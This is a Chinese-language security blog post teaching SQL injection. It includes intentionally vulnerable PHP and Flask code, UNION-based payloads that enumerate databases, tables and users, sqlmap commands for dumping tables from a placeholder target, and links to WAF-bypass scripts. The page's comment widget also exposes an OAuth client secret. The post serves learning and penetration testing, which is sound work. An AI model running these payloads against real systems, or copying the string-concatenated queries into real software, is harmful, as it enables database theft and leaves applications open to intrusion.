<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>sqli sqlmap工具常用参数示例 | ming&#39;s blog</title>
  <meta name="keywords" content=" sqli ">
  <meta name="description" content="sqli sqlmap工具常用参数示例 | ming&#39;s blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="安全练习生：渗透测试、代码审计、应急响应、服务加固用于记录一些常见问题的解决方案，以及一些学习过程中的弯弯绕绕。">
<meta property="og:type" content="website">
<meta property="og:title" content="about">
<meta property="og:url" content="https://0x404ming.github.io/about/index.html">
<meta property="og:site_name" content="ming&#39;s blog">
<meta property="og:description" content="安全练习生：渗透测试、代码审计、应急响应、服务加固用于记录一些常见问题的解决方案，以及一些学习过程中的弯弯绕绕。">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-09-28T17:59:45.000Z">
<meta property="article:modified_time" content="2024-09-29T07:20:08.367Z">
<meta property="article:author" content="ming">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.png">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.png"/>
</a>
<div class="author">
    <span>ming</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/0x404Ming"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(14)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="审计">
            
            审计
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="测试">
            <i class="fold iconfont icon-right"></i>
            测试
            <small>(6)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="测试&lt;---&gt;代理配置">
            
            代理配置
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="测试&lt;---&gt;环境配置">
            
            环境配置
            <small>(2)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="测试&lt;---&gt;cheatsheet">
            
            cheatsheet
            <small>(1)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="终端">
            
            终端
            <small>(7)</small>
        </div>
        
    </li>

            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="14">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>codeview</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>command</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>docker</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>git</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>maven</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>network</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>path</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>proxy</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sqli</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssh</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>tools</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="All 测试 环境配置 "
           href="/2024/09/30/docker/"
           data-tag="command,docker"
           data-author="" >
            <span class="post-title" title="docker 常用指令">docker 常用指令</span>
            <span class="post-date" title="2024-09-30 13:23:20">2024/09/30</span>
        </a>
        
        
        <a  class="All 测试 环境配置 "
           href="/2024/09/30/maven/"
           data-tag="maven,path"
           data-author="" >
            <span class="post-title" title="maven&amp;&amp;jdk 环境配置">maven&amp;&amp;jdk 环境配置</span>
            <span class="post-date" title="2024-09-30 12:30:31">2024/09/30</span>
        </a>
        
        
        <a  class="All 测试 代理配置 "
           href="/2024/09/30/sshvpn/"
           data-tag="tools,proxy,代理"
           data-author="" >
            <span class="post-title" title="ssh 隧道代理技术">ssh 隧道代理技术</span>
            <span class="post-date" title="2024-09-30 11:49:51">2024/09/30</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/sshrsa/"
           data-tag="tools,ssh"
           data-author="" >
            <span class="post-title" title="ssh 公钥配置">ssh 公钥配置</span>
            <span class="post-date" title="2024-09-29 21:43:49">2024/09/29</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/git/"
           data-tag="git,tools"
           data-author="" >
            <span class="post-title" title="git 版本控制常用命令">git 版本控制常用命令</span>
            <span class="post-date" title="2024-09-29 21:37:35">2024/09/29</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/networkm/"
           data-tag="tools,network"
           data-author="" >
            <span class="post-title" title="network 配置静态ip+终端代理">network 配置静态ip+终端代理</span>
            <span class="post-date" title="2024-09-29 21:31:15">2024/09/29</span>
        </a>
        
        
        <a  class="All 测试 "
           href="/2024/09/29/sqli/"
           data-tag="sqli"
           data-author="" >
            <span class="post-title" title="sqli sqlmap工具常用参数示例">sqli sqlmap工具常用参数示例</span>
            <span class="post-date" title="2024-09-29 21:14:19">2024/09/29</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/jvms/"
           data-tag="tools"
           data-author="" >
            <span class="post-title" title="jvms windows下Java版本切换">jvms windows下Java版本切换</span>
            <span class="post-date" title="2024-09-29 19:41:00">2024/09/29</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/jenv/"
           data-tag="tools"
           data-author="" >
            <span class="post-title" title="jenv linux下Java版本切换">jenv linux下Java版本切换</span>
            <span class="post-date" title="2024-09-29 19:27:27">2024/09/29</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/vim/"
           data-tag="tools"
           data-author="" >
            <span class="post-title" title="vim 常用快捷键">vim 常用快捷键</span>
            <span class="post-date" title="2024-09-29 18:49:45">2024/09/29</span>
        </a>
        
        
        <a  class="All 终端 "
           href="/2024/09/29/terminal/"
           data-tag="tools"
           data-author="" >
            <span class="post-title" title="tmux/screen 常用指令">tmux/screen 常用指令</span>
            <span class="post-date" title="2024-09-29 18:30:32">2024/09/29</span>
        </a>
        
        
        <a  class="All 测试 cheatsheet "
           href="/2024/09/29/command-cheatsheet/"
           data-tag="command"
           data-author="" >
            <span class="post-title" title="command 渗透中常用命令">command 渗透中常用命令</span>
            <span class="post-date" title="2024-09-29 17:25:44">2024/09/29</span>
        </a>
        
        
        <a  class="All 测试 "
           href="/2024/09/29/jsrpc-yakit/"
           data-tag="codeview"
           data-author="" >
            <span class="post-title" title="jsrpc+yakit 不会做题还能写出正确答案">jsrpc+yakit 不会做题还能写出正确答案</span>
            <span class="post-date" title="2024-09-29 02:59:21">2024/09/29</span>
        </a>
        
        
        <a  class="All 审计 "
           href="/2024/09/29/codeview/"
           data-tag="codeview"
           data-author="" >
            <span class="post-title" title="代码审计概述">代码审计概述</span>
            <span class="post-date" title="2024-09-29 02:56:44">2024/09/29</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-sqli" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">sqli sqlmap工具常用参数示例</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="测试">测试</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">sqli</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2024-09-29 21:25:34'>2024-09-29 21:14</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="Jump to comment area">
            <a href="#comments">
                Comment:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli"><span class="toc-text">sqli</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#example-%E8%84%86%E5%BC%B1%E4%BB%A3%E7%A0%81%E7%A4%BA%E4%BE%8B"><span class="toc-text">example 脆弱代码示例</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D"><span class="toc-text">查找数据库名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D"><span class="toc-text">查找所有数据库名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D"><span class="toc-text">查找所有表名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E7%89%B9%E5%AE%9A%E8%A1%A8%E7%9A%84%E6%89%80%E6%9C%89%E5%AD%97%E6%AE%B5"><span class="toc-text">查找特定表的所有字段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E6%89%80%E6%9C%89%E5%AD%97%E6%AE%B5%E5%8F%8A%E5%85%B6%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B"><span class="toc-text">查找所有字段及其数据类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E8%A1%A8%E7%9A%84%E4%B8%BB%E9%94%AE"><span class="toc-text">查找表的主键</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF"><span class="toc-text">获取数据库用户信息</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#poc"><span class="toc-text">poc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#payloads"><span class="toc-text">payloads</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tools"><span class="toc-text">tools</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95"><span class="toc-text">基本用法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">指定数据库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E8%A1%A8"><span class="toc-text">获取所有表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%89%B9%E5%AE%9A%E8%A1%A8%E7%9A%84%E6%89%80%E6%9C%89%E5%AD%97%E6%AE%B5"><span class="toc-text">获取特定表的所有字段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="toc-text">获取数据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-POST-%E8%AF%B7%E6%B1%82"><span class="toc-text">使用 POST 请求</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%A3%E7%90%86%E8%AE%BE%E7%BD%AE"><span class="toc-text">代理设置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96%E6%A8%A1%E5%BC%8F"><span class="toc-text">自动化模式</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bypass"><span class="toc-text">bypass</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="sqli"><a href="#sqli" class="headerlink" title="sqli"></a>sqli</h1><blockquote>
<p>简谈一下 sql 注入漏洞吧，sql 注入的原理很简单和正常查询一样，只不过我们是在外部通过非正常手段执行了 sql 命令，正常是在数据库管理工具进行，增删改查等操作，而我们通过在 web 端 ，控制某传参将变量恶意修改并拼接在内部的查询语句中从而造成注入漏洞。</p>
</blockquote>
<h2 id="example-脆弱代码示例"><a href="#example-脆弱代码示例" class="headerlink" title="example 脆弱代码示例"></a>example 脆弱代码示例</h2><p><strong>php weak code</strong></p>
<pre><code class="php">&lt;?php
$servername = &quot;localhost&quot;;
$username = &quot;username&quot;;
$password = &quot;password&quot;;
$dbname = &quot;database&quot;;

$conn = new mysqli($servername, $username, $password, $dbname);

$user_input = $_GET[&#39;id&#39;]; // 用户输入

// 不安全的 SQL 查询
$sql = &quot;SELECT * FROM users WHERE id = &#39;$user_input&#39;&quot;;
$result = $conn-&gt;query($sql);

if ($result-&gt;num_rows &gt; 0) &#123;
    while ($row = $result-&gt;fetch_assoc()) &#123;
        echo &quot;Name: &quot; . $row[&quot;name&quot;];
    &#125;
&#125; else &#123;
    echo &quot;0 results&quot;;
&#125;
$conn-&gt;close();
?&gt;
</code></pre>
<p>这段代码 用户传入 参数 <code>?id=1</code>  可控变量，这里数字1是可控的那么我们就可</p>
<p>拼接我们的恶意传参  <code>1 UNION SELECT database(); --</code></p>
<pre><code class="sql"># 查询数据库名称
SELECT * FROM users WHERE id = &#39;1 UNION SELECT database(); --&#39;
</code></pre>
<p>以下是一些常用的 SQL 注入负载，用于查找数据库、表和字段的信息：</p>
<h3 id="查找数据库名"><a href="#查找数据库名" class="headerlink" title="查找数据库名"></a>查找数据库名</h3><pre><code class="sql">1 UNION SELECT database(); --
</code></pre>
<h3 id="查找所有数据库名"><a href="#查找所有数据库名" class="headerlink" title="查找所有数据库名"></a>查找所有数据库名</h3><pre><code class="sql">1 UNION SELECT schema_name FROM information_schema.schemata; --
</code></pre>
<h3 id="查找所有表名"><a href="#查找所有表名" class="headerlink" title="查找所有表名"></a>查找所有表名</h3><pre><code class="sql">1 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = database(); --
</code></pre>
<h3 id="查找特定表的所有字段"><a href="#查找特定表的所有字段" class="headerlink" title="查找特定表的所有字段"></a>查找特定表的所有字段</h3><pre><code class="sql">1 UNION SELECT column_name FROM information_schema.columns WHERE table_name = &#39;your_table_name&#39;; --
</code></pre>
<h3 id="查找所有字段及其数据类型"><a href="#查找所有字段及其数据类型" class="headerlink" title="查找所有字段及其数据类型"></a>查找所有字段及其数据类型</h3><pre><code class="sql">1 UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name = &#39;your_table_name&#39;; --
</code></pre>
<h3 id="查找表的主键"><a href="#查找表的主键" class="headerlink" title="查找表的主键"></a>查找表的主键</h3><pre><code class="sql">1 UNION SELECT column_name FROM information_schema.key_column_usage WHERE table_name = &#39;your_table_name&#39;; --
</code></pre>
<h3 id="获取数据库用户信息"><a href="#获取数据库用户信息" class="headerlink" title="获取数据库用户信息"></a>获取数据库用户信息</h3><pre><code class="sql">1 UNION SELECT user(), version(); --
</code></pre>
<p><strong>python weak code</strong></p>
<pre><code class="python">from flask import Flask, request
import sqlite3

app = Flask(__name__)

def get_db_connection():
    conn = sqlite3.connect(&#39;database.db&#39;)
    conn.row_factory = sqlite3.Row
    return conn

@app.route(&#39;/user/&lt;id&gt;&#39;)
def get_user(id):
    conn = get_db_connection()

    # 不安全的 SQL 查询
    sql = f&#39;SELECT * FROM users WHERE id = &#123;id&#125;&#39;
    user = conn.execute(sql).fetchone()

    conn.close()

    if user is None:
        return &#39;User not found!&#39;
    return f&#39;Name: &#123;user[&quot;name&quot;]&#125;&#39;

if __name__ == &#39;__main__&#39;:
    app.run()
</code></pre>
<h1 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h1><p><strong>有效载荷 进行测试</strong></p>
<h2 id="payloads"><a href="#payloads" class="headerlink" title="payloads"></a>payloads</h2><p><a target="_blank" rel="noopener" href="https://github.com/payloadbox/sql-injection-payload-list">https://github.com/payloadbox/sql-injection-payload-list</a></p>
<h2 id="tools"><a href="#tools" class="headerlink" title="tools"></a>tools</h2><p><a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap">https://github.com/sqlmapproject/sqlmap</a></p>
<pre><code class="bash"># 将发送的数据包拦截 存放到 req.txt, --is-dba 查看是否是管理员权限
sqlmap -r req.txt --is-dba --batch --thread=5 --risk=2--level=3
</code></pre>
<p>以下是一些常用的 sqlmap 命令和参数，用于进行 SQL 注入测试：</p>
<h3 id="基本用法"><a href="#基本用法" class="headerlink" title="基本用法"></a>基本用法</h3><pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot;
</code></pre>
<h3 id="指定数据库"><a href="#指定数据库" class="headerlink" title="指定数据库"></a>指定数据库</h3><p><strong>列出所有数据库名称</strong></p>
<pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot; --dbs
</code></pre>
<h3 id="获取所有表"><a href="#获取所有表" class="headerlink" title="获取所有表"></a>获取所有表</h3><p><strong>指定数据库名称 获取该库中的所有表</strong></p>
<pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot; --tables -D database_name
</code></pre>
<h3 id="获取特定表的所有字段"><a href="#获取特定表的所有字段" class="headerlink" title="获取特定表的所有字段"></a>获取特定表的所有字段</h3><pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot; --columns -D database_name -T table_name
</code></pre>
<h3 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h3><pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot; --dump -D database_name -T table_name
</code></pre>
<h3 id="使用-POST-请求"><a href="#使用-POST-请求" class="headerlink" title="使用 POST 请求"></a>使用 POST 请求</h3><pre><code class="bash">sqlmap -u &quot;http://target.com/page.php&quot; --data &quot;param1=value1&amp;param2=value2&quot;
</code></pre>
<h3 id="代理设置"><a href="#代理设置" class="headerlink" title="代理设置"></a>代理设置</h3><pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot; --proxy &quot;http://127.0.0.1:8080&quot;
</code></pre>
<h3 id="自动化模式"><a href="#自动化模式" class="headerlink" title="自动化模式"></a>自动化模式</h3><pre><code class="bash">sqlmap -u &quot;http://target.com/page.php?id=1&quot; --batch
</code></pre>
<h2 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h2><p><strong>sqlmap 自带 tamper 可以绕过一些简单的没有设防，或是过滤规则不全的注入点</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap/tree/master/tamper">https://github.com/sqlmapproject/sqlmap/tree/master/tamper</a></p>
<p><strong>针对一些云锁的自动绕过脚本，可做学习参考使用</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/pureqh/bypasswaf">https://github.com/pureqh/bypasswaf</a></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。与我联系email c2VjaW5mby5tQGdtYWlsLmNvbQo= </span>
    </div>
</article>





    <div id="comments"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

<script type="text/javascript">
    $.getScript('/js/gitalk.js', function () {
        var gitalk = new Gitalk({
            clientID: 'Ov23liCI7IivDMb6MVcG',
            clientSecret: 'ea5df48e486b428ada9d960888e31b0d54a11ce8',
            repo: '0x404ming.github.io',
            owner: '0x404Ming',
            admin: ['0x404Ming'],
            id: decodeURI(location.pathname),
            distractionFreeMode: 'true',
            language: 'zh-CN',
            perPage: parseInt('10',10)
        })
        gitalk.render('comments')
    })
</script>




    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2018-2024 0x404ming
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 560px;
    }
    .nav.fullscreen {
        margin-left: -560px;
    }
    .nav-left {
        width: 138px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
